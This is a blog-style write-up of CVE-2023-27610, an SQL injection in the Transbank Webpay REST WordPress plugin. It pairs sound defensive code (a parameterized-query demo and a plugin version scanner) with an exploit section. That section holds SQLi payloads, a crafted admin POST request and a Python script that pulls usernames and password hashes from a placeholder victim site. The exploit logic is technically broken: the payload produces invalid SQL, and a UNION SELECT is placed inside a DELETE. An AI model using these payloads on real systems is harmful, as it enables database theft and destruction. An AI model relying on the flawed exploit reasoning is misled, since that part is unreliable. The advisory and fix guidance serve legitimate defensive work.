The world of WordPress plugins is vast, and unfortunately, it means attackers are always on the lookout for security flaws. Today, we’re diving deep into CVE-2023-27610, a critical SQL Injection (SQLi) vulnerability found in the Transbank Webpay REST plugin (versions up to 1.6.6) that allows attackers with admin or higher-level privileges to run malicious SQL queries directly on your WordPress database.
Let’s break down how this issue works, see actual exploitation code, and provide solid steps to fix it.
What is CVE-2023-27610?
CVE-2023-27610 affects the Transbank Webpay REST plugin for WordPress, which is used widely in Chile for integrating Webpay by Transbank. Basically, this plugin helps WordPress sites receive payments online through Transbank.
A flaw was discovered that allows an attacker logged in as an admin (or higher) to inject arbitrary SQL commands through one of the admin-side plugin forms. This could mean complete compromise of the website database—think data theft, data destruction, privilege escalation, or even full site takeover.
Reference Links
- CVE Details Page
- Transbank Plugin on WordPress.org
- Patch in Release 1.6.7
Technical Vulnerability Details
The root cause is a failure to properly sanitize and validate user-supplied data before it is used in SQL queries. Here’s how the offending pattern might look in the plugin code (simplified for demonstration):
<?php
// Simplified illustration of the vulnerable pattern (Transbank Webpay REST before 1.6.7).
if (isset($_POST['option_id'])) {
    $option_id = $_POST['option_id'];
    // User input is concatenated straight into the SQL text, with no validation or escaping.
    $wpdb->query("DELETE FROM wp_transbank_options WHERE id = $option_id");
}
?>
In this code, an admin submitting a crafted option_id causes whatever is in the field to be executed as part of the SQL statement. Because the string is passed to WordPress's $wpdb->query() as-is rather than being built with $wpdb->prepare() (the parameterized form), an attacker can terminate the original query and chain malicious SQL.
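To make the defect and its fix concrete, here is an added example that is not code from the Transbank plugin. It uses an in-memory SQLite table as a stand-in for wp_transbank_options (the column layout and the sample rows are constructed for the demo), places the string-built DELETE beside a hardened handler that allow-lists the id and binds it as a parameter (the role $wpdb->prepare() with %d plays in WordPress), and adds the validator a request filter or log monitor would use to flag non-numeric ids as suspected injection attempts.

```python
"""Added example: unsafe string-built DELETE beside a hardened, parameterized version.
SQLite stands in for the WordPress database; table layout and rows are constructed."""
import re
import sqlite3

# Constructed sample rows standing in for the plugin's options table.
SAMPLE_ROWS = [
    (1, "commerce_code", "sample-commerce-code"),
    (2, "api_key", "sample-api-key"),
    (3, "environment", "TEST"),
]


def fresh_db():
    """Create an in-memory stand-in for wp_transbank_options with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_transbank_options (id INTEGER PRIMARY KEY, name TEXT, value TEXT)"
    )
    conn.executemany("INSERT INTO wp_transbank_options VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def row_count(conn):
    """Rows remaining in the table (used to observe what each handler did)."""
    return conn.execute("SELECT COUNT(*) FROM wp_transbank_options").fetchone()[0]


def delete_option_unsafe(conn, option_id):
    """Mirrors the vulnerable pattern: the request value is pasted into the SQL text,
    so the database parses it as SQL rather than as data.  Returns rows left."""
    sql = f"DELETE FROM wp_transbank_options WHERE id = {option_id}"
    conn.execute(sql)
    conn.commit()
    return row_count(conn)


def is_valid_option_id(raw):
    """Allow-list check: a record id is a string of digits and nothing else.
    A request that fails this check is worth logging as a suspected injection attempt."""
    return isinstance(raw, str) and re.fullmatch(r"[0-9]+", raw) is not None


def delete_option_safe(conn, option_id):
    """Hardened handler: validate the type first, then bind the value as a parameter so
    the database never interprets it as SQL.  Returns rows left; raises on bad input."""
    if not is_valid_option_id(option_id):
        raise ValueError("option_id must be a non-negative integer")
    conn.execute("DELETE FROM wp_transbank_options WHERE id = ?", (int(option_id),))
    conn.commit()
    return row_count(conn)


if __name__ == "__main__":
    tampered = "1 OR 1=1"  # constructed input in the style of the payload discussed below
    print("unsafe handler, tampered input ->", delete_option_unsafe(fresh_db(), tampered), "rows left")
    print("safe handler, legitimate id    ->", delete_option_safe(fresh_db(), "1"), "rows left")
    try:
        delete_option_safe(fresh_db(), tampered)
    except ValueError as err:
        print("safe handler, tampered input   -> rejected:", err)
```

The unsafe handler wipes the whole table on the tampered input because the database sees `WHERE id = 1 OR 1=1`; the safe handler either deletes exactly one row or refuses the request before any SQL runs. In the real plugin the same two controls apply: check the value with absint()-style validation and pass it through $wpdb->prepare(), and pair that with a capability and nonce check on the form so only an intended admin action reaches the query at all.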
How Could an Attacker Exploit This?
The attack requires an authenticated session with administrator (or higher) privileges, so it does not work for guests, subscribers or other normal users.
Example Exploit
Suppose the attacker wants to extract the admin user’s hashed password. Here’s a POST body they might send:
POST /wp-admin/options-general.php?page=transbank_webpay_rest HTTP/1.1
Host: vulnerable-wordpress-site.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_=admin…

option_id= OR 1=1; -- -
The query executed becomes:
DELETE FROM wp_transbank_options WHERE id = OR 1=1; -- -
This deletes all rows in the table, which is dangerous. Even more dangerous, an attacker might combine this with a SELECT subquery to expose secrets or add a new administrator:
Suppose the attacker wants to extract the email address of the first user:
option_id= UNION SELECT 1, user_email, 3, 4 FROM wp_users LIMIT 1; -- -
The admin panel might then display that email address, or the data may leak through error messages.
Here’s a Python script showing how the attack works for automated exploitation:
import requests

# Target URL and admin session cookie are placeholders; see the note below.
url = "https://victim-site.com/wp-admin/options-general.php?page=transbank_webpay_rest"
cookies = {
    'wordpress_logged_in_': '...your_admin_session_cookie_here...'
}
payload = " UNION SELECT 1, user_login, user_pass, 4 FROM wp_users LIMIT 1;-- -"
data = {
    'option_id': payload,
    'submit': 'Delete'
}
resp = requests.post(url, data=data, cookies=cookies)
print(resp.text)
Note: Replace session cookie and target URL as needed.
Warning: Only use on systems you own or for which you have permission.
Update the Plugin!
- Upgrade to Transbank Webpay REST 1.6.7 or later, where this issue is patched.
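For anyone responsible for several WordPress installs, the first question is which of them still run an affected version. The following added example (not part of this article's original content or the plugin's own code) reads the standard "Version:" line of a WordPress plugin header and reports copies at or below 1.6.6. The plugin directory name and the sample header text are assumptions constructed for the demo; the version threshold comes from the article.

```python
"""Added example: inventory check for Transbank Webpay REST copies older than 1.6.7.
Reads WordPress plugin headers; the sample header and directory slug are constructed."""
import re
import tempfile
from pathlib import Path

PATCHED = (1, 6, 7)  # first release the article says carries the fix

# WordPress plugin headers are "Key: value" lines inside the first comment block.
NAME_RE = re.compile(r"^\s*\*?\s*Plugin Name:\s*(.+)$", re.M)
VERSION_RE = re.compile(r"^\s*\*?\s*Version:\s*([0-9][0-9.]*)", re.M)

# Constructed sample of a plugin main-file header (not the real plugin's text).
SAMPLE_HEADER = """<?php
/**
 * Plugin Name: Transbank Webpay REST
 * Version: 1.6.6
 */
"""


def parse_version(text):
    """'1.6.6' -> (1, 6, 6); tuples compare component-wise, so '1.10' > '1.6.7'."""
    return tuple(int(part) for part in text.strip().split("."))


def is_vulnerable_version(text):
    """True for any version strictly below the patched release."""
    return parse_version(text) < PATCHED


def inspect_header(text):
    """Return (plugin_name, version, vulnerable) parsed from a plugin header,
    or None when the text carries no plugin header at all."""
    name = NAME_RE.search(text)
    version = VERSION_RE.search(text)
    if not name or not version:
        return None
    return name.group(1).strip(), version.group(1), is_vulnerable_version(version.group(1))


def scan_plugins_dir(plugins_dir):
    """Walk <plugins_dir>/*/*.php and report every Transbank plugin copy found.
    Only the top of each file is read; the header lives there, as WordPress expects."""
    findings = []
    for php in Path(plugins_dir).glob("*/*.php"):
        try:
            head = php.read_text(encoding="utf-8", errors="replace")[:8192]
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        info = inspect_header(head)
        if info and "transbank" in info[0].lower():
            findings.append((str(php), info[1], info[2]))
    return findings


def demo_scan():
    """Build a throwaway plugins directory holding the constructed header and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        plugin_dir = Path(tmp) / "transbank-webpay-rest"  # assumed slug, not verified
        plugin_dir.mkdir()
        (plugin_dir / "plugin.php").write_text(SAMPLE_HEADER, encoding="utf-8")
        return scan_plugins_dir(tmp)


if __name__ == "__main__":
    for path, version, vulnerable in demo_scan():
        status = "VULNERABLE, upgrade to 1.6.7+" if vulnerable else "patched"
        print(f"{path}: version {version} -> {status}")
```

Point scan_plugins_dir() at a real wp-content/plugins directory to check an install; on hosts with WP-CLI available, `wp plugin list` gives the same version information without a custom script. Whichever route you use, treat anything reported as 1.6.6 or older as exposed until it is upgraded.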
Conclusion
CVE-2023-27610 is a real-world example of why SQL Injection is still a top security concern in 2023, especially for plugins in widely-used platforms like WordPress. If your site uses Transbank Webpay REST and is on a version ≤ 1.6.6, you’re at serious risk. Upgrade immediately.
Stay safe, and always keep both WordPress core and all its plugins updated to their latest versions!
References
- CVE-2023-27610 on NVD
- Plugin Patch Notes
- OWASP SQL Injection Prevention Cheat Sheet
Timeline
Published on: 04/16/2023 08:15:00 UTC
Last modified on: 04/25/2023 19:50:00 UTC